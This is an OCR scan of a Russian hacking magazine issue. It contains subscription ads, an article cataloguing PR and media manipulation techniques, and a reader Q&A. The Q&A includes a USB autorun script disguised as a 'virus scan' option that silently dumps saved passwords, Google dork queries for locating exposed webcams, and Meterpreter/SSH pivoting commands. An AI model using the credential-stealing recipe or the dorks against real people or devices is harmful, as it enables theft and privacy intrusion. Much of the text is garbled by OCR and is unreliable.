бмес. 912руб. бмес. 1080руб. 

12мес. 1656 руб. 12мес. 1960 руб. 





выходит 2 раза в месяц 

бмес. 2400руб. 
12мес. 4400 руб. 




оиохРЕпт 



оуо 




бмес. 1200 руб. 
12мес. 2200 руб. 



ОраІРНоЮ МАСТЕРСКАЯ 



ХѴ 7 ІИГ/ 1 Н 



СВОІБИЗНЕС 



О 

н 

О 

е 



б мес. 1 056 руб. 
1 2 мес. 1 920 руб. 



6 мес. 747 руб. 
12 мес. 1350 руб. 




б мес. 792 руб. 

1 2 мес. 1 440 руб. 



3 мес. 630 руб. 
бмес. 1140 руб. 




б мес. 890 руб. 
12 мес. 1630 руб. 





т 

МАСТЕРСКАЯ; 




ХУ/1 И Г/1 н 






ЖЕЛЕЗО ГОС 




6 мес. 1 200 руб. 
12 мес. 2100 руб. 



й 

00 

< 




автомобилей 



ФОРСПШ 




6 мес. 726 руб. 6 мес. 600 руб. 

12 мес. 1320 руб. 12 мес. 1080 руб. 




б мес. 1 200 руб. 
12 мес. 2100 руб. 




б мес. 990 руб. 

1 2 мес. 1 790 руб. 




СИЛА В ТУРНЕ! 




зкюазз 



Моипіаіп 

Віке 




только на сайте 

4 мес. 628 руб. 

8 мес. 1136 руб. 




только на сайте 

4 мес. 464 руб. 
8 мес. 848 руб. 




только на сайте 

4 мес. 556 руб. 

8 мес. 1008 руб. 



ИаМаІ 




6 мес. 774 руб. 
12 мес. 1404 руб. 




Вышивают 
— крестиком 




б мес. 564 руб. 
12 мес. 1105 руб. 




(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 














ІЛЧІТ5 



Оксана «Огіуапа» Андреева огіуапаШхакег.ги 




Р8ѴСН0: 

РК-ИНЪЕКЦИИ В СОЗНАНИЕ НАРОДА 

Манипул ятивные приемы подачи информации 
и инструменты манипуляции массовым сознанием 

Мы сами создаем свою субъективную реальность, отличающуюся 
от исходников настоящего мира. Именно за ней охотятся пиарщи- 
ки, маркетологи, журналисты, политики. Идет война за наши умы, 
за наши привязанности, за наш выбор. Оружием в этой войне вы- 
ступают манипуляции, призванные искажать наше восприятие, 
влияя на конечный результат. Мы должны изучить это оружие, что- 
бы самостоятельно управлять собой и делать осознанный выбор. 



Введение 

Начиная со второй половины XX века, теле- 
видение, СМИ и реклама стали основными 
инструментами воздействия на массовое 
сознание. Наши чувства, эмоции, желания, 
решения, а иногда и мировоззрение создаются 
людьми, которые профессионально занимают- 
ся РП-ом. 

Аббревиатура РР и его суть достаточно по- 
пулярны и распространены в современном 
обществе. Егоделятна подвиды, пишуто нем 
книги и учебные пособия, с оз да ют факультеты, 
институты и агентства, устраивают войны на его 
основе, выводят правила, приемы, принципы, 
основы, закономерности... Что же такое РР? 
РиЫіс Реіабопз (связи с общественностью] — 
это продолжительные, планируемыеусилия, 
которые направлены на создание и поддержку 
взаимопонимания и доброжелательных от- 
ношений между организацией и обществен- 
ностью. Я бы еще сюда добавила: создание 
образа бренда, человека, мероприятия. 

Что интересно, все эти усилия могут быть 
направлены не на свою, а на другую сторону, 
и с негативным подтекстом. И здесь мы уже 
сталкиваемся с понятием «черного» РР-а. Про- 
вокации, компроматы, акцент на негативных 



чертах — эти приемы успешно используются 
для создания негативного образа конкурента, 
маскируясь под вполне благородные цели. 

Имея в арсеналетакие мощные инструменты 
управления, грех было бы ими не воспользо- 
ваться. И ими отлично пользуются: политики, 
крупные бренды, большие социальные группы 
и все, кто хочет и имеет возможность привлечь 
на свою сторону коллективное сознание и бес- 
сознательное. 

Проводятся эти мероприятия по массовому 
манипулированию не интуитивно, «авось, 
получится», а вполне продуманно и организо- 
ванно. Поскольку прямое взывание к сознанию 
выбрать товар, услугу или кандидата воспри- 
нимается нами какгрубая агитация и вызывает 
негативную реакцию, для достижения цели 
используются другие, менее явные способы. 
РП-щики отлично знают, какую струну нашей 
души зацепить и на какую кнопку бессознатель- 
ного нажать, чтобы достичь нужного эффекта. И 
об этом мы поговорим подробнее. 

Принципы воздействия 
на массовое сознание 

• Принцип последовательности: если мы убе- 
дили человека сделать первый шаг — считай, 



начало положено. Например, он заявил в 
камеру, что будет голосовать за кандидата Н. 

И теперь он должен отстаивать свою позицию, 
если не хочет, чтобы за ним закрепилась слава 
«непоследовательного балабола». А если он 
еще и принял участие в дебатах на тему «Какой 
кандидат лучше» — дело практически сделано. 
У нас в сверхсознании заложены установки: 
«если сказал А, говори Б», «начал дело — 
закончи», «настоящие мужчины не меняют 
мнения как перчатки». И на этих установках 
можно играть. 

• Принцип авторитета: мы склонны дове- 
рять людям, которые уже добились славы, 
признания, авторитета. Таким людям мы 
подсознательно приписываем умение лучше 
разбираться в любых вопросах. Пример. 
Предвыборная кампания. Старушка сулицы 
говорит, что будет голосовать за кандидата В. 
Азвезда шоу-бизнеса заявляето симпатии к 
кандидату П. Чье слово выглядит авторитет- 
нее? Другой пример: известный спортсмен 
рекламирует стиральный порошок или зубную 
пасту — ему мы поверим больше, чем незнако- 
мому человеку. 

• Принцип благосклонности: мы легче верим 
симпатичному и обаятельному, чем некраси- 
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Сколько изданий — столько и мнений. Кому верить? 



вому и угрюмому. С одной стороны, красивому 
человеку хочется сделать что-то приятное, с 
другой — срабатываетассоциация «Если он 
пользуется туалетной водой «Возз» и при этом 
имееттакую популярность среди женщин, 
то, наверное, в этом парфюме что-то есть...». 

В психологии это называют гало-эффектом. 
Понятно, почему в большинстве рекламных 
роликов мы видим красавцев и красавиц. 

Если же в ролике задействован человек не 
особо привлекательной внешности, можно 
говорить о том, что реклама ориентирована на 
чувства, а не на принцип аналогии или благо- 
склонности. 

• Принцип заразительности: если большин- 
стволюдей покупает какой-либотовар, велика 
вероятность, что мы неосознанно сделаем то 
же самое, разтак много покупателей его берут, 
значит, он хороший. Наверное, ты не раз заме- 
чал, что возле одного лотка стоиттолпа, а возле 
другого — пара человек, притом, чтотовартам и 
там примерно одинакового качества. 

• Принцип взаимного обмена: в супермаркете тебе 
предлагают бесплатно попробовать новый сок. 
Многие из нас в качестве признательности купят 
его, даже если он не нужен. Срабатываетустановка 
«за все нужно платить» или «сделали приятное — 
скажи «спасибо»». Принцип взаимного обмена 



хорошо работает и тогда, когда кандидат в мэры 
раздает старичкам крупу или яблоки, а они из 
чувства благодарности за него голосуют. 

• Принцип дефицита: мы все знакомы с ре- 
кламными фразами «Только сегодня! Только до 
18:00! Скидка 30%!». Страх опоздания и потери 
движет людьми, часто заставляя их покупать 
ненужныетовары. 

Приемы манипулирова- 
ния, используемые 
вСМИиРК 

• Принцип первоочередности: наша психика 
устроенатак, что сознание запоминаетто, что 
стало известно в первую или в последнюю оче- 
редь, а бессознательное — то, что «спрятано» 
посредине. Вспоминаем знаменитую тройную 
петлю Милтона Эрикссона. 

• Очевидцы событий, или эффект присутствия: 
сторона-манипулятор подбирает людей, 
которые якобы были очевидцами обсуждаемого 
события. Например, «Гражданин Н., работаю- 
щий дворником, вто утро видел, какв 5:43 утра 
мужчина из черной «Хонды» передал человеку в 
серебристой «Тойоте» папку с документами. Имя 
свидетеля мы не называем в целях его безопас- 
ности». В данном случае проверить этот факт не- 
возможно, но возмущенное народное сознание 



быстро словит «засекреченную» информацию, 
не проверяя ее истинность. Обрати внимание: 
указаниеточного времени (или другихданных, 
которые невозможно проверить) вызывает до- 
верие и одновременно отвлекаетвнимание от 
других фактов, которые нужно скрыть. 
Совсемужявноэтотприем показан в передачах 
типа «Любовные истории с Юлианой Шаховой» 
или «Окна с Дмитрием Нагиевым», когда актеры 
воспроизводят криминальный или любовный 
сюжет более или менее приближенно к реаль- 
ности. Естественно, перед камерой никто никого 
убивать не будет, но вид ножа и испуганное лицо 
«жертвы» как будто переносят на место проис- 
шествия. Согласись, вставляет намного больше, 
чем сухой рассказ, хотя умом и понимаешь, что 
все наиграно. А вот инсценированные съемки 
с места боевых действий иногда и не отличишь 
от реальных. Один репортер вспоминал, как они 
приезжали в Афганистан снимать войну, а там 
какназло именно втотмоментбоевыхдействий 
не было. Тогда они заказывали имитацию — до- 
плачивалиталибам зато, что они наденутмаски, 
побегают и постреляют на заднем плане. Свист 
пуль, сотрясающаяся камера, напряженный 
голос журналиста, перекрикивающий грохот 
канонад — все это заставляет нас верить в 
реальность боевых действий. Нуи небольшой 
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акцент, «случайно» поставленный репортером, 
окончательно убеждает нас в агрессивности той 
или иной стороны. Эффект достигнут. 

В данном случае «спецэффекты», сопрово- 
ждающие подачу информации, отвлекают от 
всех возможных несовпадений в текстовке, а 
иногда и от самой текстовки. Мы ведь любим 
зрелища, правда? :) 

• Образ врага: искусственно формируется 
образ, несущий угрозу обществу. Это может 
быть партия, соседнее государство, религия 
или болезнь. Когда люди чувствуютугрозу, 
их сознание сужается, и они объективно вос- 
принимаюттолько информацию, связанную 
с защитой себя. Легко управлять людскими 
массами в этом состоянии. Например, из 
боязни заразиться свиным гриппом люди не 
выходят на забастовки или предвыборные 
митинги. 

• Смещение акцентов: любопытный прием, 
когда общеизвестная негативная сторона 
кандидата, явления, продукта упоминается 
вскользь, но при этом делается сильный акцент 
на положительных качествах. Например, «Нам 
прожужжали уши о криминальном прошлом 
этого человека, но мало кто знает, что именно 



он всегда защищал слабых, вставал на сторону 
справедливости, помогал нуждающимся. И об 
этом давайте подробнее...» 

• Эмоциональное заражение: прием, помо- 
гающий обойти логические выводы (сознание] 
за счет использования чувств (подсознание 

и сверхсознание]. Пример: «Да, мы знаем, 
чтоХ. украл большую сумму денег (вердикт 
сознания — «виноват»]. Нознаемлимыопри- 
чинах? Знаем ли мы о том, что эти деньги были 
потрачены на строительство детского дома 
(приюта для собачек, больницы для онкоболь- 
ных]? (чувства выходят на первый план, доводы 
сознания ослабевают]». Лучше всего этот 
прием использовать втолпе, где критичность 
восприятия информации снижена, и люди 
верятэмоциональномулидеру. Клидерам, ча- 
стично использующим прием эмоционального 
заражения, можно отнести В. Жириновского, 

А. Гитлера. 

• Показная проблематика: в мире ежедневно 
происходит множество событий. О некоторых 
из них едва упоминается, зато другие постоян- 
но освещаются. Создаются паника, ажиотаж, 
чтобы отвлечь внимание оттех событий, кото- 
рые манипулятор хочетскрыть. 



Ролик Рерзі с Бритни Спирс стал 
одной из самых громких реклам 
сучастием звезды шоу-бизнеса. 
Отличный примертого, как 
популярность субъекта влияет 
на потребителя 

• Удар на опережение: манипулятивный прием, 
часто используется в политической сфере. 
Возьмем две партии: А и Б. Партия Азнает, что 
с ее репутацией не все гладко, и что инфор- 
мация об этом естьу партии Б. Поэтому А роет 
компромат на Б и первой на носит удар. После 
этого Б вместо нападения будетзащищаться. 
Даже если со стороны Б ответный удар-таки 
будет, то партия уже опорочена, и эта информа- 
ция людьми воспримется с недоверием. 

• Ложный накал страстей, другими словами, 
сенсация, требующая быстрого принятия 
решения. Например, за 2-3 недели до выборов 
в прессе появляется негативный компромат 
(необязательно правдивый] на одного из ли- 
дирующих кандидатов. В свете новых событий 
электорату нужно срочно менять предпочте- 
ния, возникает некоторая паника. В атмосфере 
стресса подаваемая информация восприни- 
мается некритично. Это самый подходящий 
момент, чтобы ненавязчиво переключить 
внимание людей на другого кандидата. 

• Эффект правдоподобности: наша психи- 
ка устроена так, что источник, которому мы 
доверяем, не проверяется на достоверность 
информации. Соответственно, если манипуля- 
тор подаст, например, 70% правды (или просто 
информации втаком виде, чтобы люди хотели в 
нее верить], то остальные 30% уже никто прове- 
рять не будет. Следует учитывать, что мы часто 
верим вто, во что хотим верить, даже если это 
далеко от истины. 

• Эффект информационного штурма: напри- 
мер, манипулятору нужно скрыть информацию, 
которая уже поступила в широкие массы. Для 
этого в народ подается много разных, часто 
противоречивых версий по этомуже вопро- 
су. Втаком потоке информации критичность и 
способность к анализу снижается, и те данные, 
которые желательно скрыть, просто теряются. 

• Обратный эффект: прием хорошо работает в 
политике и бизнесе. В адрес кандидата льется 
столько негативной информации, что она в 
ито ге дости га ет п роти в о п ол ожн о го эффе кта : 
вместо неприятия он начинает вызывать у 
публики жалость и желание защитить его. 

• Будничный рассказ: лишь небольшую долю 
информации мы воспринимаем со слов, осталь- 
ное: невербальные проявления, интонация, 
паузы, а фоновое сопровождение играет 
решающую роль в окончательном восприятии. 
Становится понятно, почему действует та кой 
прием: негативные события подаются ровным 

и спокойным голосом, как будто ничего не 
произошло. И подсознание воспринимаетвсе 
какнечто обыденное, привычное. И наоборот, 
диктор может подавать ничего незначащие 
данныетревожным напряженным голосом, на 
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Привидение гриппа Н1 N1 надолго парализовалообщественнуюжизнь 
на постсоветском пространстве. Не говоря уже о панике. Кому это 
было выгодно? 



заднем плане звучиттревожная музыка. Эффект 
воздействия на подсознание — потрясающий. 

• Принцип контраста: вначале в очень негатив- 
ном ключе освещаются люди или события, на- 
пример, финансовый кризис. А потом на фоне 
этих событий подается информация о человеке, 
который ведет правильный образжизни и 
выглядит положительно на фоне предыдущих 
действующих лиц. За счет игры на контрасте 
герой выглядитзначительно ярче. 



зывается доверие кдеятельности компании или 
политика. Например, он бывший спортсмен и 
достигуспеха на международной арене, значит 
и в политике он также легко сможет добиться 
поставленных целей. 

• Искусственное просчитывание ситуации: 
с помощью социологических исследова- 
ний манипуляторы изучают популярность 
информации, которую собираются подавать 
(компромат, биографию, легенду]. Непо- 



• Повторение: чем чаще звучит какая-либо 
информация, тем крепче она укореняется в 
сознании граждан, воспри ни маясь как истина. 
Чем проще и понятнее фразы, тем сильнее 
эффектвнушения. Большинство рекламных 
или политических слоганов подаются в виде 
коротких фраз. 

Психологическая 
подоплека приемов 
манипулирования 

Большинство приемов манипулирования 
строится на знании особенностей нашей 
психики: сознания и бессознательного (сверх- 
сознания и подсознания]. Поскольку подсозна- 
ние (наши инстинкты, желания, потребности, 
чувства, эмоции] и сверхсознание (установки, 
воспитание, принципы морали, совести, уко- 
ренившиеся общественные нормы] сильнее, 
чем сознание, то основное воздействие при 
манипуляциях идет на них. Если надавить на 
жалость, призвать ксправедливости, актуа- 
лизировать угрозу здоровью, благополучию, 
вызвать чувство вины или благодарности, 
шокировать, можно добиться большего резуль- 
тата, чем просто разумно аргументировать в 
пользутого или иного выбора. 

Поэтому для рекламы банка используется сю- 
жет, где показана счастливая семья, имеющая 
все, что захочет (надежда на лучшее будущее); 
для рекламы партии — кадры, где кандидатза- 
ботится о пожилых людях (ассоциациирование 
старичков с родителями и благодарность за то, 
что не сделанное нами нужное дело, наконец 
сделано); вотпочему с плакатов социальной 



Если надавить на жалость, призвать к справедли- 
вости, актуализировать угрозу здоровью, благопо- 
лучию, вызвать чувство вины или благодарности, 
шокировать, можно добиться большего результа- 
та, чем просто разумно аргументировать в пользу 
того или иного выбора 



• Экспрессивный удар: этот прием произ- 
водит эффект психологического шока, в 
результате которого снижается критичность, 
повышается эмоциональность, и за счет 
эмоций создается необоснованный негатив в 
адрес некоего кандидата или продукции. На- 
пример, показывается тяжелая жизнь людей, 
которые в двадцатиградусный мороз живут 
без отопления и горячей воды. Возмущение 
берет верх над разумом. В этот момент можно 
выдвигать обвинения в адрес, скажем, пар- 
тии, которая «обещала и не сделала». Партия 
может не иметь отношения к событиям, но 
эмоциональная составляющая помогаетсо- 
знанию принять все сказанное на веру. 

• Ложные аналогии, или диверсия против 
логики: путем ложных аналогий улюдей вы- 



пулярную отбрасывают, а ту, что заинтере- 
совала людей, подают в привлекательном 
виде, используя перечисленные приемы 
манипуляций. 

•Допуск к власти: прием для кардинального 
изменения мнения. Основан на том, что чело- 
веку устраивается встреча слидером оппози- 
ции, настроенным весьма доброжелательно. 
Сам эффект встречи со «знаменитостью», да 
еще и приветливой, может произвести сильное 
впечатление на человека, в результате он из 
чувства признательности кардинально меняет 
свое мнение на противоположное (нужное 
манипулятору]. Например, фанат поп-музыки 
меняетсвое мнение послетеплой беседы с 
солистом рок-группы, которую он раньше не 
любил. 



рекламы на нас смотрятоблысевшие после 
химиотерапии дети с отчаянием в глазах (вина 
зато, что мы, возможно, им уже не сможем 
помочь]. 

Обрати внимание, что большинство удач- 
ных рекламных сюжетов не затрагивают 
непосредственно рекламируемый продукт, 
услугу или кандидата. Они направлены на 
наши эмоции и чувства. А бессознательный 
механизм ассоциаций помогает связать 
сильный эмоциональный всплеске рекла- 
мируемым объектом. Такая реклама делает- 
ся не спонтанно: вначале возникают идеи, 
затем тщательно разрабатывается техника 
внедрения этих идей, потом тестовые вари- 
анты идут на социологические опросы, где 
«простые смертные» нажимают кнопочки 
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ІЛЧІТ5 




Архетип Вождя. Основные 
черты: мудрость р умение 
взятьответственность на 
себя, лидерство. Не правда л и р 
вызывает доверие? 

эти образы и сценарии развития событий (ми- 
фологемы] перекликаются суже знакомыми 
нам с детства сказками, легендами, мифами. 
Борьба политиков с коррупцией (кризисом, 
монополией и т.п.) ассоциируется с мифом 
про Георгия Победоносца, поражающего 
Змия. Аэтот миф, в свою очередь, восходит к 
мифам о Геракле, Зевсе и других богах; суть 
мифов — борьба Добра (политик, Георгий- 
Победоносец, Геракл] со Злом (коррупция, 
Змий, огнедышащее чудовище]. В результате 
борьбы спасен народ (в мифах — образ, олице- 
творяющий народ]. Кто, как и для чего борется 
с коррупцией — неизвестно, но искусственно 
проводимые аналогии играют на руку манипу- 
ляторам. 

Точнотакже для дискредитации конкурентов 
проводятся аналогии и с негативными образа- 
ми. Например, электорат кандидата: рабочие, 
алкоголики, слой населения с низкой культу- 
рой — ассоциируется с образом Ада (нижний 
мир). Соответственно, высвечивая в прессе 



Для дискредитации конкурентов проводятся ана- 
логии и с негативными ооразами. 

Например, электорат кандидата: рабочие, 
алкоголики, слой населения с низкой 
культурой - ассоциируется с образом Ада 
(нижний мир). 



и выбирают наиболее понравившиеся 
варианты. Самое же удачное воплощение 
идет в эфир. 

Использование архети- 
пов, символов и мифов 
для манипуляций 
бессознательным 

Архетипы — это то коллективное бессозна- 
тельное, которое дается каждому из нас при 
рождении. Это результат многовекового опыта 
наших предков, который передается в виде 
генетически заложенной информации. Мы 
можем их не осознавать, но из подсознания 
они воздействуют на наше поведение, миро- 
воззрение, практически на все сферы нашей 
жизни. Архетипические образы автоматически 
распознаются нами как нечто близкое, на- 
деленное знакомы ми нам качествами. Образы 
Ангела, Героя, Мудреца успешно используют 
политики при построении своей легенды. Все 



Грамотно организованная «Оранжевая революция» 2004 года 
всколыхнула сердца и сознание многих и за пределами Украины 
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Запуск воздушных шаров — неизменный атрибут крупной РР-акции 
или рекламной кампании 



Ліскг 




РР — связи с общественностью 



эту категорию потенциальных избирателей 
конкурента, РР-щики на уровне подсознания 
сравнивают кандидата со злым началом. 
Подробнее об архетипах можно узнать из 
работ Карла Юнга. 

Несколько примеров 
из жизни 

Приведу несколько наиболее удачных при- 
меров манипуляции массовым сознанием, 
чтобы проиллюстрировать, как это все 
работает. 

Пример первый. Многие помнят «Оранже- 
вую революцию» 2004 года в Киеве. Народ 
вышел на митинг. Против толпы брошены 
войска со щитами, дубинками и оружием. 



И что увидели солдаты, прибывшие на 
«поле боя»? Их встречали не разъяренные 
мужики с палками, а старенькие бабушки с 
цветочками (сразу возникает ассоциация 
с пожилой матерью или бабушкой]. Каково 
поднять дубинку на родную мать? Или на 
маленького улыбающегося ребенка, про- 
тягивающего тебе ручонку с апельсин кой? 
Организаторы акции хорошо знали, что 
солдаты — это, в первую очередь, люди. И 
в экстремальных ситуациях подсознание 
берет верх над приказом свыше. Кто был 
в это время на площади Независимости, 
помнит, какая атмосфера любви и добра 
там царила. Армия против таких эмоций 
бессильна. 



Еще один важный момент: если бы солда- 
ты все же подняли руку на беззащитных 
неагрессивных людей, не дававших повода 
для расправы, вмешались бы международ- 
ные организации, наблюдавшие за проис- 
ходящим. Проигрыш «синей» стороны был 
бы гарантирован еще сильнее. 

Второй пример. В прошедших выборах на 
Украине основными лидерами были Юлия Ти- 
мошенко и Виктор Янукович. Перед самыми 
выборами, в некоторых печатных и интернет- 
СМИ прокатились новости отом, что Ю. Ти- 
мошенко собирается перекрыть доступ к со- 
циальным сетям осіпокіаззпікі.ги и ѵкопіакіе. 
ги. А это наиболее посещаемые и любимые 
среди большинства ресурсы натерритории 
бывшего СНГ. Документальной видеозаписи 
этих слов представлено не было, были только 
статьи, причем без цитат. И тутже были при- 
ведены дословные фразы людей из команды 
В. Януковича о том, что они постараются во 
что бы то ни стало не допустить закрытия 
ресурсов. Проверить эту информацию не- 
возможно, да и если логически подумать, то, 
во-первых, это нарушение закона о свободе 
доступа к информации, во-вторых, прокси 
и ѴРЫ еще никто не отменял. Но люди в это 
поверили, началась паника. Примерхорошо 
демонстрирует приемы, описанные выше: 
«ложный накал страстей», «образ врага», 
«удар на опережение», «экспрессивный 
удар», «искусственное просчитывание ситуа- 
ции», «повторение». По результатам пред- 
варительных опросов после этой «новости» 
рейтинг Юлии Тимошенко упал. 

Заключение, 

или как не поддаваться 

манипуляциям 

со стороны 

СМИ и РК-щиков 

Если мы среднестатистические граждане, 
живем в социуме и автоматически воспри- 
нимаем все, что нам подают, не поддаваться 
манипуляциям тяжело. Но возможно. Для 
этого достаточно: 

• знать основные приемы воздействия (про- 
читав статью, ты уже имеешь о них представ- 
ление); 

• уметь выделить их в массе информации, 
льющейся на нас из СМИ, рекламных пла- 
катов, слухов в интернете (имея перечень 
приемов — ищи, соотноси, тренируйся]; 

• понимать, что если это есть, значит, кому-то 
это выгодно (иначе, кто будетспонсироватьту 
же прессу]; 

• не принимать поспешных решений, особен- 
но если налицо недостаток информации, или 
она не проверена; 

• стараться иметь свое личное мнение по 
любому значимому для тебя вопросу; 

• и, конечно же — думать, анализировать и 
больше доверять себе. 

Осваивай, тренируйся и не забывай, что опыт- 
ные манипуляторы — такие же люди, просто 
они чаще читают рубрику Р5УСН0! :1 т 
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0: Мне кажется, все мои пароли увели. Причем 
кто-то из знакомых, кто имел доступ к компью- 
теру. Как это могло выйти? 

А: Все зависит от фантазии злодея. Для 
осуществления его коварных замыслов 
вполне могла быть заготовлена специальная 
флешка, с помощью которой можно незамет- 
но вытащить очень много полезной инфы. 
Скажем, многие пользователи, да и автор 
этой статьи например, позволяет браузеру и 
другим программам сохранять пароли. Вот их 
и проще всего увести с помощью нехитрого 
набора софта: 

• МеззепРазз [ уумуу.тгзои.пеДиШз/ппзразз. 

Мші) — восстанавливает пароли к боль- 
шинству популярных программ для обмена 
мгновенными сообщениями: М5Ы Меззепдег, 
ѴѴі пс1о\л/5 Меззепдег, Ѵабоо Меззепдег, ІСО, 
ТгіШап, Мігапба и ОАІМ; 

• Маіі РаззѴіеѵѵ [ ѵѵѵѵѵѵ.пігзоі'цпеі/иіііз/ппаіірѵ. 
Ыті ) — извлекает сохраненные пароли из 
почтовых клиентов: Оииоок Ехргезз, Місгозои 
Оииоок 2000, Місгозоіі Оииоок 2002/2003, 
ІпсгесІіМаіІ, Еибога, Ыеізсаре Маіі, Могіііа 
ТбипбегЬігб; 



• ІЕ Раззѵіеѵѵ [ ѵѵѵѵѵѵ.пігзои.пеі/иіііз/іпіегпеі: 
ехріогег раззѵуогб.ЫтО — выдергивает 
логины и пароли, сохраненные Іпіегпеі: 
Ехріогег-ом; 

• Ргоіесіеб Віогаде РаззѴіеѵѵ [ ѵѵѵѵѵѵ.пігзои.пеі:/ 
иІіІз/рзрѵ.ЫтО — восстанавливает все паро- 
ли, сохраненные в защищенном хранилище; 

• РаззѵѵогбЕох [ ѵѵѵѵѵѵ.пігзои.пеі/иШз/ 
раззѵуогбЬх.ЫтІ ) — получает все пароли, 
сохраненные Еігеіох'ом. 

Ничего не стоит, заранее сохранив бинарники 
на флешке, потом запускать их в автозапуске. 
Создаем аиіюгип.іпі со следующим содержа- 
нием: 

[аиСогип] 

ореп=1аипсЪ. . ЬаС 

АСТІ(Ж= Регіогт а Ѵігиз Зсап 

Азатем ІаипсЬ.Ьаи 

зСагС тзразз.ехе /зСехС тзразз.СхС 
зСагС таіірѵ.ехе /зСехС таіІрѵ.СхС 
зСагС іерѵ.ехе /зСехС іерѵ.СхС 
зСагС рзрѵ.ехе /зСехС рзрѵ.СхЦ 



зСагС раззмогсііох . ехе /зСехС 
раззѵгогсііох . СхС 

После этого злоумышленнику остается только 
подключить фл ешку и в появившемся рорир- 
окне выбрать "АСТЮМ= Регіогт а Ѵігиз 5сап", 
чтобы обзавестись большим количеством 
паролей, которые сохранятся в текстовых 
файлах. 

О: Как найти веб-камеры, доступ к которым 
открыт прямо из инета? 

А: Вспоминаем статьи по поводу «Соодіебаск 
для маленьких!» [ ѵѵѵѵѵѵ.хакер.ги/ппадагіпе/ 
ха/076/056/1 .азр ] и берем на вооружение 
несколько полезных запросов: 

іпигі : "СдіЗСагЦ?раде= " 

іпигі : /ѵіем. зНШтІ 

іпСіСІе : "Ьіѵе Ѵіеѵѵ / - АХІ8 

іпигі : ѵіеѵ\Щѵіетлп зІШтІ 

іпигі : Ѵіеѵ^егРгаше?Мо<іе= 

іпигі : Ѵіеѵ^егРгаше?Мос1е=КеігезЬ. 

іпигі : ахіз-сді/зрд 

іпигі : ахіз-сді/шзрд (тоСіоп- ЦРЕС) 
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(сіізсоппескесі) 

іпигі : ѵіечлЩіпсІехРгате . зкСтІ 
іпигі : ѵі еш/ іпсіех . зіШтІ 
іпигі : ѵіеѵ^/ѵіехѵ. зЪ.кт1 
Ііѵеарріек 

іпкікіе: " Ііѵе ѵіеѵ?" іпкік1е:ахіз 
іпкікіе : Ііѵеарріек 
аІІіпРіРІе: "Ыекчлгагк Сатега 
БекчлгогкСатега" (сіізсоппескесі) 
іпкік1е:ахіз іпкікіе : " ѵісіео 
зегѵег " 

іпкікіе : Ііѵеарріек іпигі : БѵАррІ 
іпкікіе: "ЕѵоСат" іпигі: "меЪсат. 
ЬШтІ " 

іпкікіе: "Ьіѵе ЫекЗпар Сат-Зегѵег 
іеед" 

іпкікіе : "Ьіѵе Ѵіеѵ? / - АХІЗ" 
іпигі : іпсІехРгате . зТШтІ Ахіз 
іпигі : "МиІЬіСатегаРгате?МосІе=МоЬіо 
п" (сІізсоппесШесІ) 
іпкікіе : зкагк іпигі : сдізкагЬ 
іпкіЫе: " зопу пекѵгогк сатега 
зіке: . ѵіеѵтексат. сот -шт . 
ѵіешіексат. сот 

іпкіЫе: "ТозкіЪа Бекчлгогк Сатега" 
изег Іодіп 

іпкіЫе: "пексат Ііѵе ітаде" 
(сіізсоппескесі) 

іпкіЫе: " і-Сакскег Сопзоіе — ШеЬ 
МопіЬог " 

0: Какудалить из ОС драйверы неиспользуе- 
мыхустройств? 

А: Подключив даже один раз беспроводную 
мышку, чужую флешку или любой другой 
девайс, мы вынуждаем ОС устанавливать для 
них драйвер, который остается даже в том 
случае, если сами устройства больше никогда 
не используются. Таким образом, в системе 
появляются «устройства-призраки» , что в 
свою очередь приводит ктому, что ОС начинает 
долго загружаться. Крайне желательно хотя 
бы иногда чистить ОС отдрайверовтаких 
неиспользуемыхустройств, с чем отлично 
справляется утилита СЬозіВизІег (дЬозіЬизІег. 
сосіеріех.сот). Главное — неудалитьлишнего! 

0: Столкнулся с такой проблемой. Выполняю 
пентест корпоративной сети, разделенной 
файрволом на две части (режет все кроме 
НТТР/НТТРБ-трафика). Уже получил до- 
ступ к машине из первой половины сети 
(172.16.186.132). Сэтой машины получил до- 
ступ через теіегргеіег-сессию кодной из ма- 
шин из второй половины сети (172.16.186.126) 
(та, что за файрволом). Можно ли как-то заста- 
вить N655115 просканировать вторую половину 
сети через теіегргеіег-сессию? 

А: Да, такая проблема довольно часто воз- 
никает как в ходе взлома, так и при проведе- 
нии пентестинга. Схема действий такова (в 
описании условимся, что машина из первой 
половины сети — атакующая, из второй — 
жертва): 



1. Сначала необходимо через теіегргеіег- 
сессию установить ОрепЗЗН на машину- 
жертву. Задача необычная, но весь процесс 
очень хорошо описан в статье: раскеіЬеабег 
Ыод5ро1.сот/2009/01/іп5ІаШпд-орепз5І~і-оп- 
ѵѵіпсІоѵѵз-ѵіа.ЫтІ . 

2. После установки ОрепЗЗН и создания 
учетной записи нужно настроить Меіегргеіег, 
чтобы весь входящий трафик на 8000 порт 
атакующей машины форвардился на 22 порт 
жертвы: 

теЬегргеЬег> рогЫѵлі а<М -Ь 
172.16.186.132 -1 8000 -г 
172.16.186.128 -р 22 

3. Пускаем 55Н-соединение через атакующую 
машину (1 72.16.186.132): 

# ззЪ. -Б 127.0.0.1:9000 -р 8000 
изегпате@172 .16.186. 132 

Данная команда поднимает50СК54-прокси 
на 9000 порту, который форвардит весьтрафик 
до жертвы через 55Н-сессию. 

4. Используем РП0ХѴСНАІЫ5 для того, чтобы 
пуститьтрафик пеззизсі через 50СК54-прок- 
си, висящем на 9000 порту (для этого необхо- 
димо внести небольшие изменения в файл 
конфигурации ргохусЬаіпз.соп! — в частности 
поменять порт, указанный в последней строке 
файла): 

# ргохускаіпз /изг/зЪіп/пеззизс! -Б 

5. Запускаем Ыеззиз-клиент и можем скани- 
ровать сеть. 

0: В последнее время стал замечать, что 
ѴѴігезНагк при большом потоке пакетов начи- 
наетсильно подвисать. Есть ли какой-то способ 
исправить это? 

А: Проблема втом, что ѴѴі гезГіа гк-у необхо- 
димо одновременно перехватывать пакеты, 
разбирать их на части и обновлять окно с 
информацией. При анализе большого потока 
пакетов слабая машина банально не справ- 
ляется. Выход есть — консольная версия 
ѴѴігезЬагкТзЬагк. Тулза поставляется вместе с 
основной программой и имеет внушительный 
список опций для запуска (справка выдается 
по команде ІзЬагк -Ы. 

Какэто использовать? Для начала работы 
нужно сперва выбрать сетевой интерфейс для 
прослушивания. Списокдоступных интер- 
фейсов запрашивается командой ІзЬагк 
-0. Вывод будет представлять собой нечто 
подобное: 

1. \Беѵісе\БРР_{ 11А468В6-С065- 
45Р6-АВ32 -Б69695А6Р601 } (М3 Типпеі 
Іпкегіасе Бгіѵег) 

2. \Беѵісе\БРР_{А16900АЗ-020С- 
